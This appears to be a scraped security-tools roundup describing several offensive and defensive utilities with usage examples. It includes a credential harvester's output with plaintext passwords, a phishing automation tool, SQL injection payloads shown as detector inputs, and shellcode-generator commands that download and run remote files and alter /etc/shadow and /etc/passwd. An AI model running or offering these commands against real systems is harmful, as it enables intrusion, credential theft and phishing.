SubDomain Analyzer - Get detailed information of a domain

The "SubDomain Analyzer" tool written in Python language. The purpose of "SubDomain Analyzer" getting full detailed information of selected domain. The "SubDomain Analyzer" gets data from domain by following steps:

1. Trying to get the zone tranfer file.
2. Gathers all information from DNS records.
3. Analyzing the DNS records (Analyzing all IP's addresses from DNS records and test class C range from IP address (For example: 127.0.0.1/24) and getting all data that containing the domain being analyzed).
4. Tests subdomains by dictionary attack.

The Subdomain Analyzer can keep new addresses which found on DNS records or IP's analyzer. The Subdomain Analyzer can brings a very qualitative information about the domain being analyzed, additionally, he shows a designed report with all the data.

Examples:

• Analyzing example.com domain: subdomain-analyzer.py example.com
• Analyzing example.com domain, save the records on log file by name log.txt, works with 100 threads and use by another dictionary file by name another-file.txt: subdomain-analyzer.py example.com --output log.txt --threads 100 --sub-domain-list another-file.txt
• Analyzing example.com domain, save the records on log file by name log.txt and append a new sub-domains to sub-domains list file: subdomain-analyzer.py example.com -o log.txt --sub-domain-list

Requirements:

Linux Installation:

1. sudo apt-get install python-dev python-pip
2. sudo pip install -r requirements.txt
3. easy_install prettytable

MacOSx Installation:

1. Install Xcode Command Line Tools (AppStore)
2. sudo easy_install pip, prettytable
3. sudo pip install -r requirements.txt

Windows Installation:

1. Install dnspython
2. Install gevent
3. Install prettytable
4. Open Command Prompt(cmd) as Administrator -> Goto python folder -> Scripts (cd c:\Python27\Scripts)
5. pip install -r (Full Path To requirements.txt)
6. easy_install prettytable

Download SubDomain Analyzer

Read More

SQLChop - SQL Injection Detection Engine

SQLChop is a novel SQL injection detection engine built on top of SQL tokenizing and syntax analysis. Web input (URLPath, body, cookie, etc.) will be first decoded to the raw payloads that web app accepts, then syntactical analysis will be performed on payload to classify result. The algorithm behind SQLChop is based on compiler knowledge and automata theory, and runs at a time complexity of O(N).

Documentation

http://sqlchop.chaitin.com/doc.html

Dependencies

The SQLChop alpha testing release includes the c++ header and shared object, a python library, and also some sample usages. The release has been tested on most linux distributions.
If using python, you need to install protobuf-python, e.g.:

$ sudo pip install protobuf

If using c++, you need to install protobuf, protobuf-compiler and protobuf-devel, e.g.:

$ sudo yum install protobuf protobuf-compiler protobuf-devel

Build

• Download latest release at https://github.com/chaitin/sqlchop/releases
• Make
• Run python2 test.py or LD_LIBRARY_PATH=./ ./sqlchop_test
• Enjoy!

SQLChop Python API

The current alpha testing release is provided as a python library. C++ headers and examples will be released soon.
The following APIs are the main interfaces SQLChop export.

is_sqli

Given a raw payload, determine whether the payload is an SQL injection payload.

• Parameter: string
• Return value: bool, return True for SQLi payload, return False for normal case.

>>> from sqlchop import SQLChop
>>> detector = SQLChop()
>>> detector.is_sqli('SELECT 1 From users')
True
>>> detector.is_sqli("' or '1'='1")
True
>>> detector.is_sqli('select the best student from classes as the student union representative')
False
>>> detector.is_sqli('''(select(0)from(select(sleep(0)))v)/*'+(select(0)from(select(sleep(12)))v)+'"+(select(0)from(select(sleep(0)))v)+"*/''')
True

classify

Given a web application input, classify API will decode the input and find possible SQL injection payload inside. If SQLi payload found, payloads will be listed.

• Parameter 1: object with following keys
  1. urlpath: string, the urlpath of web request
  2. body: string, the http body of POST/PUT request
  3. cookie: string, the cookie content of web request
  4. raw: string, other general field that needs general decoding.
• Parameter 2: detail, if detail is True, detailed payload list will be returned, if False, only result will be returned, which runs faster.
• Return: an object contains result and payloads
  1. result: int, positive value indicates the web request contains sql injection payload
  2. payloads: list of objects containing key, score, value and source
     • key: string, reserved
     • source: string, shows where this payload is embed in original web request and how the payload is decoded
     • value: decoded sqli payload
     • score: the score of the decoded sqli payload

Examples here:

>>> from sqlchop import SQLChop
>>> detector = SQLChop()
>>> detector.classify({'urlpath': '/tag/sr/news.asp?d=LTElMjBhbmQlMjAxPTIlMjB1bmlvbiUyMHNlbGVjdCUyMDEsMiwzLGNocigxMDYpLDUsNiw3LDgsOSwxMCwxMSwxMiUyMGZyb20lMjBhZG1pbg==' }, True)
>>> 
{
    'payloads': [{
        'key': '',
        'score': 4.070000171661377,
        'source': 'urlpath: querystring_decode b64decode url_decode ',
        'value': '-1 and 1=2 union select 1,2,3,chr(106),5,6,7,8,9,10,11,12 from admin'
    }],
    'result': 1
}

>>> detector.classify({'body': 'opt=saveedit&arrs1[]=83&arrs1[]=69&arrs1[]=76&arrs1[]=69&arrs1[]=67&arrs1[]=84&arrs1[]=32&arrs1[]=42&arrs1[]=32&arrs1[]=70&arrs1[]=114&arrs1[]=111&arrs1[]=109&arrs1[]=32&arrs1[]=84&arrs1[]=97&arrs1[]=98&arrs1[]=108&arrs1[]=101&arrs1[]=32&arrs1[]=87&arrs1[]=72&arrs1[]=69&arrs1[]=82&arrs1[]=69&arrs1[]=32&arrs1[]=78&arrs1[]=97&arrs1[]=109&arrs1[]=101&arrs1[]=61&arrs1[]=39&arrs1[]=83&arrs1[]=81&arrs1[]=76&arrs1[]=32&arrs1[]=105&arrs1[]=110&arrs1[]=106&arrs1[]=101&arrs1[]=99&arrs1[]=116&arrs1[]=39&arrs1[]=32&arrs1[]=97&arrs1[]=110&arrs1[]=100&arrs1[]=32&arrs1[]=80&arrs1[]=97&arrs1[]=115&arrs1[]=115&arrs1[]=119&arrs1[]=111&arrs1[]=114&arrs1[]=100&arrs1[]=61&arrs1[]=39&arrs1[]=39&arrs1[]=32&arrs1[]=97&arrs1[]=110&arrs1[]=100&arrs1[]=32&arrs1[]=67&arrs1[]=111&arrs1[]=114&arrs1[]=112&arrs1[]=61&arrs1[]=39&arrs1[]=39&arrs1[]=32&arrs1[]=111&arrs1[]=114&arrs1[]=32&arrs1[]=49&arrs1[]=61&arrs1[]=40&arrs1[]=83&arrs1[]=69&arrs1[]=76&arrs1[]=69&arrs1[]=67&arrs1[]=84&arrs1[]=32&arrs1[]=64&arrs1[]=64&arrs1[]=86&arrs1[]=69&arrs1[]=82&arrs1[]=83&arrs1[]=73&arrs1[]=79&arrs1[]=78&arrs1[]=41&arrs1[]=45&arrs1[]=45&arrs1[]=32&arrs1[]=39'}, True)
>>>
{
    'payloads': [{
        'key': '',
        'score': 3.9800000190734863,
        'source': 'body: querystring_decode ',
        'value': "SELECT * From Table WHERE Name='SQL inject' and Password='' and Corp='' or 1=(SELECT @@VERSION)-- '"
    }, {
        'key': '',
        'score': 2.0899999141693115,
        'source': 'body: querystring_decode ',
        'value': "'SQL inject' and Password"
    }, {
        'key': '',
        'score': 2.180000066757202,
        'source': 'body: querystring_decode ',
        'value': "(SELECT @@VERSION)-- '"
    }, {
        'key': '',
        'score': 0.0,
        'source': 'body: querystring_decode ',
        'value': 'saveedit'
    }],
    'result': 1
}

Customization

The is_sqli API (in sqlchop.py) detects SQLi using score 2.1 as threshold, you can adjust this threshold according to your usage scenario.

    def is_sqli(self, payload):
        ret = self.score_sqli(payload)
        return ret > 2.1  # here you can modify and test this threshold

    def classify(self, request, detail=False):
        ...

Download SQLChop

Read More

CredCrack - Fast and Stealthy Credential Harvester

CredCrack is a fast and stealthy credential harvester. It exfiltrates credentials recusively in memory and in the clear. Upon completion, CredCrack will parse and output the credentials while identifying any domain administrators obtained. CredCrack also comes with the ability to list and enumerate share access and yes, it is threaded!

CredCrack has been tested and runs with the tools found natively in Kali Linux. CredCrack solely relies on having PowerSploit's "Invoke-Mimikatz.ps1" under the /var/www directory.

Help

usage: credcrack.py [-h] -d DOMAIN -u USER [-f FILE] [-r RHOST] [-es]
                    [-l LHOST] [-t THREADS]

CredCrack - A stealthy credential harvester by Jonathan Broche (@g0jhonny)

optional arguments:
  -h, --help            show this help message and exit
  -f FILE, --file FILE  File containing IPs to harvest creds from. One IP per
                        line.
  -r RHOST, --rhost RHOST
                        Remote host IP to harvest creds from.
  -es, --enumshares     Examine share access on the remote IP(s)
  -l LHOST, --lhost LHOST
                        Local host IP to launch scans from.
  -t THREADS, --threads THREADS
                        Number of threads (default: 10)

Required:
  -d DOMAIN, --domain DOMAIN
                        Domain or Workstation
  -u USER, --user USER  Domain username

Examples: 

./credcrack.py -d acme -u bob -f hosts -es
./credcrack.py -d acme -u bob -f hosts -l 192.168.1.102 -t 20

Examples

Enumerating Share Access

./credcrack.py -r 192.168.1.100 -d acme -u bob --es
Password:
 ---------------------------------------------------------------------
  CredCrack v1.0 by Jonathan Broche (@g0jhonny)
 ---------------------------------------------------------------------

[*] Validating 192.168.1.102
[*] Validating 192.168.1.103
[*] Validating 192.168.1.100

 -----------------------------------------------------------------
 192.168.1.102 - Windows 7 Professional 7601 Service Pack 1 
 -----------------------------------------------------------------

 OPEN      \\192.168.1.102\ADMIN$ 
 OPEN      \\192.168.1.102\C$ 

 -----------------------------------------------------------------
 192.168.1.103 - Windows Vista (TM) Ultimate 6002 Service Pack 2 
 -----------------------------------------------------------------

 OPEN      \\192.168.1.103\ADMIN$ 
 OPEN      \\192.168.1.103\C$ 
 CLOSED    \\192.168.1.103\F$ 

 -----------------------------------------------------------------
 192.168.1.100 - Windows Server 2008 R2 Enterprise 7601 Service Pack 1 
 -----------------------------------------------------------------

 CLOSED    \\192.168.1.100\ADMIN$ 
 CLOSED    \\192.168.1.100\C$ 
 OPEN      \\192.168.1.100\NETLOGON 
 OPEN      \\192.168.1.100\SYSVOL 

[*] Done! Completed in 0.8s

Harvesting credentials

./credcrack.py -f hosts -d acme -u bob -l 192.168.1.100
Password:

 ---------------------------------------------------------------------
  CredCrack v1.0 by Jonathan Broche (@g0jhonny)
 ---------------------------------------------------------------------

[*] Setting up the stage
[*] Validating 192.168.1.102
[*] Validating 192.168.1.103
[*] Querying domain admin group from 192.168.1.102
[*] Harvesting credentials from 192.168.1.102
[*] Harvesting credentials from 192.168.1.103

                  The loot has arrived...
                         __________
                        /\____;;___\    
                       | /         /    
                       `. ())oo() .      
                        |\(%()*^^()^\       
                       %| |-%-------|       
                      % \ | %  ))   |       
                      %  \|%________|       


[*] Host: 192.168.1.102 Domain: ACME User: jsmith Password: Good0ljm1th
[*] Host: 192.168.1.103 Domain: ACME User: daguy Password: P@ssw0rd1!

     1 domain administrators found and highlighted in yellow above!

[*] Cleaning up
[*] Done! Loot may be found under /root/CCloot folder
[*] Completed in 11.3s

Download CredCrack

Read More

Geotweet - Social engineering tool for human hacking

Another way to use Twitter and instagram. Geotweet is an osint application that allows you to track tweets and instagram and trace geographical locations and then export to google maps. Allows you to search on tags, world zones and user (info and timeline).

Requirements

• Python 2.7
• PyQt4, tweepy, geopy, ca_certs_locater, python-instagram
• Works on Linux, Windows, Mac OSX, BSD

Installation

git clone https://github.com/Pinperepette/Geotweet_GUI.git
cd Geotweet_GUI
chmode +x Geotweet.py
sudo apt-get install python-pip
sudo pip install tweepy
sudo pip install geopy
sudo pip install ca_certs_locater
sudo pip install python-instagram
python ./Geotweet.py

Video

Download Geotweet

Read More

Katoolin - Automatically install all Kali Linux tools

Automatically install all Kali linux tools

Features

• Add Kali linux repositories
• Remove kali linux repositorie
• Install Kali linux tools

Requirements

• Python 2.7
• An operating system (tested on Ubuntu)

Instalation

sudo su
git clone https://github.com/LionSec/katoolin.git && cp katoolin/katoolin.py /usr/bin/katoolin
chmod +x /usr/bin/katoolin
sudo katoolin

Video

Usage

• Just select the number of a tool to install it
• Press 0 to install all tools
• back : Go back
• gohome : Go to the main menu

Download Katoolin

Read More

Whonix v11 - Anonymous Operating System

Whonix is an operating system focused on anonymity, privacy and security. It’s based on the Tor anonymity network, Debian GNU/Linux and security by isolation. DNS leaks are impossible, and not even malware with root privileges can find out the user’s real IP.

Whonix consists of two parts: One solely runs Tor and acts as a gateway, which we call Whonix-Gateway. The other, which we call Whonix-Workstation, is on a completely isolated network. Only connections through Tor are possible.

Whonix for Qubes

https://www.whonix.org/wiki/Qubes

Whonix for KVM

https://www.whonix.org/wiki/KVM

Whonix for VirtualBox

https://www.whonix.org/wiki/VirtualBox

If you want to upgrade existing Whonix version using Whonix’s APT repository

Special instructions required:

https://www.whonix.org/wiki/Upgrading_Whonix_10_to_Whonix_11

Changelog between Whonix 10.0.0.5.5 and Whonix 11.0.0.2.3:

– fixed custom workstation build

– build script: refactoring, use errtrace rather than many traps – https://phabricator.whonix.org/T48

– build script: refactoring, use exit trap to reduce code duplication – https://phabricator.whonix.org/T269

– whonixcheck: warn if whonix-gateway / whonix-workstation package is not installed – https://phabricator.whonix.org/T264

– whonixcheck: warn if there is low entropy – https://phabricator.whonix.org/T202

– build, anon-apt-sources-list, anon-shared-build-apt-sources-tpo, whonix-repository: changed release codename from wheezy to jessie – https://phabricator.whonix.org/T270

– grub-enable-apparmor: Refactoring. Simplified for Debian jessie. Thanks to the new `/etc/default/grub.d` configuration folder, the `grub-enable-apparmor` has been greatly simplified. No longer need to config-package-dev divert `/etc/default/grub`.

– genmkfile: if debuild not available, recommend installation of the devscripts package

– build script: added fakeroot to whonix_build_script_build_dependency (required for verifiable builds)

– genmkfile: if debuild not available, recommend installation of the devscripts package

– genmkfile: fix, do not set automatically make_use_gain_root_command to true if fakeroot is not installed

– genmkfile: run dpkg-checkbuilddeps before lintian to show better hint if build dependencies are missing

– build script: build-steps.d/1200_create-debian-packages: commented out get_extra_packages, no longer need to download packages from testing

– build script: refactoring, created separate help step, help-steps/git_sanity_test

– whonixcheck: verbose output for check_tor_socks_port_reachability

– all packages: packaging, bumped Standards-Version from 3.9.4 to 3.9.6 for jessie support

– lintian warning copyright fix

– tb-updater: show “highest version number is not necessarily the best one” message also on first run if no Tor Browser is installed yet – https://phabricator.whonix.org/T283

– build script: No longer install acpi-support-base by default on jessie, because systemd now implements that functionality. – https://phabricator.whonix.org/T284

– whonixcheck: added link to Whonix Build Version documentation https://www.whonix.org/wiki/Whonixcheck#Whonix_Build_Version – https://phabricator.whonix.org/T276

– build script: Fix commit 287bdcf6ddee007ba579e3ee9a1997edc8188581 ‘”makefile: added –pedantic to default DEBUILD_LINTIAN_OPTS because we are going to fix the last remaining “missing upstream changelog” warning’ – added –pedantic help-steps/variables.

– all packages: added debian/source/lintian-overrides with debian-watch-may-check-gpg-signature to fix lintian warning – https://phabricator.whonix.org/T277

– whonix-setup-wizard, anon-gw-anonyminizer-config, whonixcheck, whonix-ws-start-menu-additions, whonix-host-firewall: added ‘Keywords=’ to ‘.desktop’ files to fix lintian warning ‘desktop-entry-lacks-keywords-entry’ – https://phabricator.whonix.org/T281

– anon-shared-helper scripts: replaced dependency ‘python-support (>= 0.90)’ with dh-python to fix lintian warning

– control-port-filter-python: packaging, use debhelper with python2 to fix lintian warning

– modify apt-get parameters during build to prevent need to remove apt-listchanges – https://phabricator.whonix.org/T282

– build-script: refactoring, moved variables DEBIAN_FRONTEND DEBIAN_PRIORITY DEBCONF_NOWARNINGS APT_LISTCHANGES_FRONTEND from help-steps/variables to buildconfig.d/30_apt_opts

– genmkfile: hint “Is the build dependency genmkfile installed?” if genmkfile is not installed

– genmkfile: hint ‘dpkg-parsechangelog not found. Do you have the “build-essential” package installed?’ if dpkg-parsechangelog is not available

– sdwdate: removed dependency on ruby1.9.1-dev to fix lintian warning ‘E: sdwdate: depends-on-obsolete-package depends: ruby1.9.1-dev’

– whonixcheck: show diagnostic message on whonixcheck Whonix News gpg verification failure by default

– build script: Fix building Whonix on Whonix, fix if `lsb_release –short –i` returns ‘Whonix’. Temp hack ‘export whonix_build_on_operating_system=”debian”‘ no longer required. Thanks to @nrgaway for the bug report and the analysis. – https://phabricator.whonix.org/T278

– tb-updater: tbbversion_installed parser fix

– anon-meta-packages: removed dependency on libupower-glib1 which is no longer available in Debian jessie (which has been replaced by upower, that already gets installed)

– anon-base-files, whonix-developer-meta-files: implemented WHONIX_BUILD_QUBES=true environment variable support – https://phabricator.whonix.org/T298

– anon-meta-packages: whonix-gateway and whonix-workstation package no longer depend on anon-shared-build-fix-grub because it has been made a weak dependency for better physical isolation and Qubes support

– code simplification, removed support for environment variable ANON_BUILD_INSTALL_TO_ROOT=true because anon-shared-build-fix-grub now gets only installed on required platforms

– implemented build parameter ‘–unsafe-io true’, that speeds up builds, that uses ‘-o Dpkg::Options::=–force-unsafe-io’, eatmydata and ignores ‘sync’. – Thanks to @nrgaway for the suggestion!  – https://phabricator.whonix.org/T295

– implemented $apt_misc_opts – https://phabricator.whonix.org/T295

– whonixcheck: new –verbose debug feature, showing output of systemd-detect-virt

– vbox-disable-timesync: more robust implementation that is compatible with systemd – https://phabricator.whonix.org/T106

– timesync: compatibility with systemd – https://phabricator.whonix.org/T106

– whonixcheck, msgdispatcher: ported to systemd – https://phabricator.whonix.org/T106

– qubes-whonix: skip rads on Qubes – https://phabricator.whonix.org/T306

– systemd unit files: workaround/fix, removed spaces from ‘WantedBy = ‘, likely bug in ‘deb-systemd-helper’ that prevents enabling the service by default – https://phabricator.whonix.org/T316

– created a hellodaemon package, useful for Debian systemd packaging debugging – not part of Whonix – https://github.com/adrelanos/hellodaemon

– whonixcheck: debian/control: fix, added to ‘Build-Depends:’ ‘ruby-ronn (>= 0.7.3)’

– disable torsocks warning spam – https://phabricator.whonix.org/T317

– whonix-libvirt: fixed CI builds

– whonix-libvirt: added driver name=’qemu’ – Thanks to HulaHoop! – https://github.com/Whonix/whonix-libvirt/pull/20 https://github.com/Whonix/whonix-libvirt/pull/19 https://github.com/Whonix/whonix-libvirt/pull/18

– anon-meta-packages: added obfs4proxy to anon-gateway-packages-recommended – https://phabricator.whonix.org/T323

– anon-meta-packages: added apt-transport-tor to anon-shared-packages-recommended – https://phabricator.whonix.org/T92

– whonix-gw-network-conf, whonix-ws-network-conf: Removed ‘pre-up /usr/bin/whonix_firewall’, because /etc/network/if-pre-up.d to load the firewall, because of a Debian upstream bug interface comes up even if a script in /etc/network/if-pre-up.d/ fails http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=700811 was fixed. – https://phabricator.whonix.org/T68

whonix-gw-firewall, whonix-ws-firewall, whonix-host-firewall: Made package more standalone. Requiring ‘pre-up /usr/bin/whonix_firewall’ in /etc/network/interfaces is no longer necessary. Added etc/network/if-pre-up.d/30_whonix_firewall to load the firewall, because of a Debian upstream bug ‘interface comes up even if a script in /etc/network/if-pre-up.d/ fails’ http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=700811 was fixed. – https://phabricator.whonix.org/T68

– whonixsetup, whonix-setup-wizard: fix ‘Tor fails after reload related to torrc DisableNetwork setting issue’ by only restarting Tor, no longer trying to reload Tor – https://phabricator.whonix.org/T320

– rads: Improved implementation. When there is enough RAM… On ‘enter’: instantly start login manager. On ‘ctrl + c’: instantly abort and do not start login manager. On ‘timeout’: start login manager. Thanks to ‘dh_systemd_start –no-start’ we can now use ‘StandardInput=tty’ and ‘read’ instead of ‘systemd-ask-password’. Now we could even implement an interactive menu at boot (that allows to configure wait time and/or disabling rads). – https://phabricator.whonix.org/T57

– whonixcheck: abolished random wait by default – https://phabricator.whonix.org/T299

– anon-ws-disable-stacked-tor: fixed ‘insserv: script tor.anondist-orig: service tor already provided!’ warning during upgrades – https://phabricator.whonix.org/T303

– anon-ws-disable-stacked-tor: systemd compatibility – https://phabricator.whonix.org/T303

– anon-base-files: no longer ‘set -o pipefail’ in /usr/lib/pre.bsh. config-package-dev doesn’t like ‘set -o pipefail’ – http://mailman.mit.edu/pipermail/config-package-dev/2015-May/000041.html – https://phabricator.whonix.org/T329

– upstream bug report: spaces in Tor’s systemd unit file causes issues – https://trac.torproject.org/projects/tor/ticket/16162

– upstream bug report: Tor dies on reload when swichting to ‘DisableNetwork 0’ when using ‘DnsPort 127.0.0.1:53’ – https://trac.torproject.org/projects/tor/ticket/16161

build script: fix, support ‘–verifiable false’ (was ‘–verifiable minimal’ while build documentation said ‘false’)

– uwt: multi user fix – https://www.whonix.org/forum/index.php/topic,1267

– Qubes: WiFi Realtek RTL8191SEvB Issue and Solution – https://groups.google.com/forum/#!topic/qubes-users/kMGTSwP72aU

– whonix-setup-wizard API proposal: https://www.whonix.org/wiki/Dev/whonixsetup

Download Whonix v11

Read More

SPF - SpeedPhish Framework

SPF (SpeedPhish Framework) is a python tool designed to allow for quick recon and deployment of simple social engineering phishing exercises.

Requirements:

• dnspython
• twisted
• PhantomJS

Usage:

usage: spf.py [-h] [-f <list.txt>] [-C <config.txt>] [--all] [--test] [-e]
              [-g] [-s] [--simulate] [-w] [-W] [-d <domain>]
              [-c <company's name>] [--ip <IP address>] [-v] [-y]

optional arguments:
  -h, --help           show this help message and exit
  -d <domain>          domain name to phish
  -c <company's name>  name of company to phish
  --ip <IP address>    IP of webserver defaults to [192.168.1.124]
  -v, --verbosity      increase output verbosity

input files:
  -f <list.txt>        file containing list of email addresses
  -C <config.txt>      config file

enable flags:
  --all                enable ALL flags... same as (-e -g -s -w)
  --test               enable all flags EXCEPT sending of emails... same as
                       (-e -g --simulate -w -y -v -v)
  -e                   enable external tool utilization
  -g                   enable automated gathering of email targets
  -s                   enable automated sending of phishing emails to targets
  --simulate           simulate the sending of phishing emails to targets
  -w                   enable generation of phishing web sites
  -W                   leave web server running after termination of spf.py

misc:
  -y                   automatically answer yes to all questions

Execution:

cd spf
python spf.py --test -d example.com

or to just test the websites:

cd spf
python web.py default.cfg

Misc

Video of sample usage

BsidesKnox 2015 video

Download SpeedPhish Framework

Read More

OWASP ZSC Shellcoder - Generate Customized Shellcodes

OWASP ZSC is an open source software in python language which lets you generate customized shellcodes for listed operation systems. This software can be run on Windows/Linux&Unix/OSX and others OS under python 2.7.x.

Description

Usage of shellcodes

Shellcodesare small codes in assembly which could be use as the payload in software exploiting. Other usages are in malwares, bypassing antiviruses, obfuscated codes and etc.

Why use OWASP ZSC ?

According to other shellcode generators same as metasploit tools and etc, OWASP ZSC using new encodes and methods which antiviruses won't detect. OWASP ZSC encoderes are able to generate shellcodes with random encodes and that's lets you to get thousands new dynamic shellcodes with same job in just a second,that means you will not get a same code if you use random encodes with same commands, And that make OWASP ZSC one of the bests! otherwise it's gonna generate shellcodes for many operation systems in next versions.

Help Menu

Switches:
-h, --h, -help, --help => to see this help guide
-os => choose your os to create shellcode
-oslist   => list os for switch -os
-o => output filename
-job => what shellcode gonna do for you ?
-joblist => list of -job switch
-encode => generate shellcode with encode
-types => types of encode for -encode switch
-wizard => wizard mod

-update => check for update
-about => about software and developers.

With these switch you can see the oslist,encode types and functions [joblist] to generate your shellcode.
OS List "-oslist"

[+] linux_x86
[+] linux_x64
[+] linux_arm
[+] linux_mips
[+] freebsd_x86
[+] freebsd_x64
[+] windows_x86
[+] windows_x64
[+] osx
[+] solaris_x86
[+] solaris_x64

Encode Types "-types"

[+] none
[+] xor_random
[+] xor_yourvalue
[+] add_random
[+] add_yourvalue
[+] sub_random
[+] sub_yourvalue
[+] inc
[+] inc_timesyouwant
[+] dec
[+] dec_timesyouwant
[+] mix_all

Functions "-joblist"

[+] exec('/path/file')
[+] chmod('/path/file','permission number')
[+] write('/path/file','text to write')
[+] file_create('/path/file','text to write')
[+] dir_create('/path/folder')
[+] download('url','filename')
[+] download_execute('url','filename','command to execute')
[+] system('command to execute')
[+] script_executor('name of script','path and name of your script in your pc','execute command')

Now you are able to choose your operation system, function, and encode to generate your shellcode, But all of these features are not activated yet, so you have to look up this table HERE to see what features are activated.

For example, this part of table telling us all functions for linux_x86 is activated, But Encodes [xor_random, xor_yourvalue, add_random, add_yourvalue, sub_random, sub_yourvalue, inc, inc_timesyouwant, dec, dec_timesyouwant] are just activated for chmod() function.

Examples

>zsc -os linux_x86 -encode inc -job "chmod('/etc/passwd','777')" -o file
>zsc -os linux_x86 -encode dec -job "chmod('/etc/passwd','777')" -o file
>zsc -os linux_x86 -encode inc_10 -job "chmod('/etc/passwd','777')" -o file
>zsc -os linux_x86 -encode dec_30 -job "chmod('/etc/passwd','777')" -o file
>zsc -os linux_x86 -encode xor_random -job "chmod('/etc/shadow','777')" -o file.txt
>zsc -os linux_x86 -encode xor_random -job "chmod('/etc/passwd','444')" -o file.txt
>zsc -os linux_x86 -encode xor_0x41414141 -job "chmod('/etc/shadow','777')" -o file.txt
>zsc -os linux_x86 -encode xor_0x45872f4d -job "chmod('/etc/passwd','444')" -o file.txt
>zsc -os linux_x86 -encode add_random -job "chmod('/etc/passwd','444')" -o file.txt
>zsc -os linux_x86 -encode add_0x41414141 -job "chmod('/etc/passwd','777')" -o file.txt
>zsc -os linux_x86 -encode sub_random -job "chmod('/etc/passwd','777')" -o file.txt
>zsc -os linux_x86 -encode sub_0x41414141 -job "chmod('/etc/passwd','444')" -o file.txt
>zsc -os linux_x86 -encode none -job "file_create('/root/Desktop/hello.txt','hello')" -o file.txt
>zsc -os linux_x86 -encode none -job "file_create('/root/Desktop/hello2.txt','hello[space]world[space]!')" -o file.txt
>zsc -os linux_x86 -encode none -job "dir_create('/root/Desktop/mydirectory')" -o file.txt
>zsc -os linux_x86 -encode none -job "download('http://www.z3r0d4y.com/exploit.type','myfile.type')" -o file.txt
>zsc -os linux_x86 -encode none -job "download_execute('http://www.z3r0d4y.com/exploit.type','myfile.type','./myfile.type')" -o file.txt
#multi command
>zsc -os linux_x86 -encode none -job "download_execute('http://www.z3r0d4y.com/exploit.type','myfile.type','chmod[space]777[space]myfile.type;sh[space]myfile.type')" -o file.txt
>zsc -os linux_x86 -encode none -job "script_executor('script.type','D:\\myfile.type','./script.type')" -o file.txt
>zsc -os linux_x86 -encode none -job "script_executor('z3r0d4y.sh','/root/z3r0d4y.sh','sh[space]z3r0d4y.sh')" -o file.txt
>zsc -os linux_x86 -encode none -job "script_executor('ali.py','/root/Desktop/0day.py','chmod[space]+x[space]ali.py;[space]python[space]ali.py')" -o file.txt
>zsc -os linux_x86 -encode none -job "system('ls')" -o file.txt
>zsc -os linux_x86 -encode none -job "system('ls[space]-la')" -o file.txt
>zsc -os linux_x86 -encode none -job "system('ls[space]-la[space]/etc/shadow;chmod[space]777[space]/etc/shadow;ls[space]-la[space]/etc/shadow;cat[space]/etc/shadow;wget[space]file[space];chmod[space]777[space]file;./file')" -o file.txt
>zsc -os linux_x86 -encode none -job "system('wget[space]file;sh[space]file')" -o file.txt
>zsc -os linux_x86 -encode none -job "chmod('/etc/shadow','777')" -o file.txt
>zsc -os linux_x86 -encode none -job "write('/etc/passwd','user:pass')" -o file.txt
>zsc -os linux_x86 -encode none -job "exec('/bin/bash')" -o file.txt

Note: Don’t use space ‘ ’ in system() function, replace it with “[space]” , software will detect and replace “ ” for you in shellcode.

Note: script_executor(),download_execute(),download(),dir_create(),file_create() are using linux command line , not the function. [wget,mkdir,echo] system() function added in script, you can use it to do anything and generate any command line shellcode.

Note: exec() doesn’t support any ARGV same as exec(‘/bin/bash -c ls’) or exec(‘/bin/bash’,‘-c’,‘ls’), you have to wait for next version and this feature will available in system()

Note: you also can use high value for inc and dec time, like inc_100000, your shellcode may get too big

Note: each time you execute chmod()[or any other] function with random encode, you are gonna get random outputs and different shellcode.

Note: your xor value could be anything. “xor_0x41414141” and “xor_0x45872f4d” are examples.

Wizard Switch

With -wizard switch you are able to generate shellcode without long ARGVs, software will ask you for information.

Note: While you are using -wizard switch, if you push “Enter” without typing anything, the default value will be set on the varible.

Note: With entering “list”, List of values will be shown.

Available Features

• add length calculator for output
• add filename writer in gcc commandline in output file
• fixed bug in encoding module not available.
• fixed bug in os module not available
• add “-wizard” switch
• add installer “use ‘zsc’ commandline in terminal after installed”
• add uninstaller
• This Software just could be run on linux since this version
• change output to .c file and automated shellcode generating
• add color output for termina
• add inc encoding chmod() [linux_x86]
• add inc_timesyouwant chmod() [linux_x86]
• add dec encoding chmod() [linux_x86]
• add dec_timesyouwant chmod() [linux_x86]
• add features table inside “features_table.html”
• add -about to menu for developers name and etc
• fixed permission number calculating in chmod() [linux_x86]
• software’s signature changes
• bug fix reported by user in executing on linux , color function
• add xor_random encoding chmod() [linux_x86]
• add xor_yourvalue encoding chmod() [linux_x86]
• add add_random encoding chmod() [linux_x86]
• add add_yourvalue encoding chmod() [linux_x86]
• add sub_random encoding chmod() [linux_x86]
• add sub_yourvalue encoding chmod() [linux_x86]
• fixed shellcode encode type checking
• [linux_x86 modules completed]
• add script_executor() [linux - using command execution]
• add download_execute() [linux_x86 - using command execution (wget)]
• add download() [linux_x86 - using command execution (wget)]
• add dir_create() [linux_x86 using command execution]
• add file_create() [linux_x86 using command execution]
• add encodes file for next version released
• add system() [linux_x86 command execute]
• fixed chmod filename ¼ char length [linux_x86]
• fixed exec filename ¼ char length [linux_x86]
• fixed write filename ¼ length [linux_x86]
• fixed write content ¼ length [linux_x86]
• fixed write length calculator [linux_x86]
• and fixed some other bugs in coding [core]
• system() function added in script, you can use it to do anything and generate any command line shellcode.
• add chmod() [linux_x86] -> chmod(‘/path/file’,‘perm_num’)
• add write() [linux_x86] -> write(‘/path/file’,‘content’)
• add exec() [linux_x86] -> exec(‘/path/file’)
• add encode [none - all os]
• add mix_all encoding in chmod() [linux_x86]
• add xor_random encoding in system() [linux_x86]
• add xor_yourvalue encoding in system() [linux_x86]
• add add_random encoding in system() [linux_x86]
• add add_yourvalue encoding in system() [linux_x86]
• add sub_random encoding in system() [linux_x86
• add sub_yourvalue encoding in system() [linux_x86]
• add inc encoding in system() [linux_x86]
• add inc_timesyouwant encoding in system() [linux_x86
• add dec encoding in system() [linux_x86]
• add dec_timesyouwant encoding in system() [linux_x86]
• add mix_all encoding in system() [linux_x86]
• add xor_random encoding in file_create() [linux_x86]
• add xor_yourvalue encoding in file_create() [linux_x86]
• add add_random encoding in file_create() [linux_x86]
• add add_yourvalue encoding in file_create() [linux_x86]
• add sub_random encoding in file_create() [linux_x86
• add sub_yourvalue encoding in file_create() [linux_x86]
• add inc encoding in file_create() [linux_x86]
• add inc_timesyouwant encoding in file_create() [linux_x86
• add dec encoding in file_create() [linux_x86]
• add dec_timesyouwant encoding in file_create() [linux_x86]
• add mix_all encoding in file_create() [linux_x86]
